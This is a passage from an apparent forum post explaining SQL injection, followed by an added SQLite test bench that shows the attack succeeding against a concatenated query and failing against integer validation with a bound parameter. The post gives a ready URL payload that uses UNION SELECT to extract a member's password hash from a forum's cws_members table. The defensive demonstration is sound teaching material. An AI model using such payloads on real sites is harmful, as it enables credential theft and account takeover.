If I were to make use of an SQL injection, it means I can insert/execute commands directly into the database - for example, in a URL I could do:
Code:
pirate.pa.forum/index.php?par=2%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=1
It's powerful enough that I can bypass the actual login process based on a hash and its associated member ID - and thus gain complete access to a forum.
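Added example, not part of the original post and not the forum software's code: a self-contained SQLite test bench showing why the URL above works against a query built by string concatenation, and how integer validation plus a bound parameter stops it. The `topics` table, its columns and the stored value are constructed for illustration; only `cws_members`, `member_id`, `password` and the payload come from the post.

```python
import sqlite3

# Payload from the post above, URL-decoded (%20 -> space).
PAYLOAD = ("2 UNION SELECT null,null,null,null,null,null,password,null "
           "FROM cws_members WHERE member_id=1")

def make_db():
    """Constructed in-memory schema standing in for the forum database."""
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(1, 8))
    # Hypothetical 8-column table, matching the 8 columns in the UNION.
    db.execute(f"CREATE TABLE topics (id INTEGER, {cols})")
    db.execute("INSERT INTO topics VALUES (2,'a','b','c','d','e','hello','g')")
    db.execute("CREATE TABLE cws_members (member_id INTEGER, password TEXT)")
    db.execute("INSERT INTO cws_members VALUES (1, 'CONSTRUCTED_HASH')")
    return db

def lookup_vulnerable(db, par):
    # The request value is pasted into the SQL text, so the database
    # parses everything after "2" as part of the statement.
    return db.execute(f"SELECT * FROM topics WHERE id = {par}").fetchall()

def lookup_hardened(db, par):
    # 1) Allow-list: the parameter must be a plain ASCII integer.
    if not (par.isascii() and par.isdigit()):
        raise ValueError("par must be an integer")
    # 2) Bind it as data; it is never parsed as SQL.
    return db.execute("SELECT * FROM topics WHERE id = ?", (int(par),)).fetchall()

def leaked(rows):
    """True if any returned row contains the stored password value."""
    return any("CONSTRUCTED_HASH" in row for row in rows)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks hash:", leaked(lookup_vulnerable(db, PAYLOAD)))
    print("hardened, normal id  :", lookup_hardened(db, "2"))
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened, payload    : rejected,", exc)
```

A rejected `par` value is also a useful detection signal: logging it with the source address gives defenders a record of probing against that parameter.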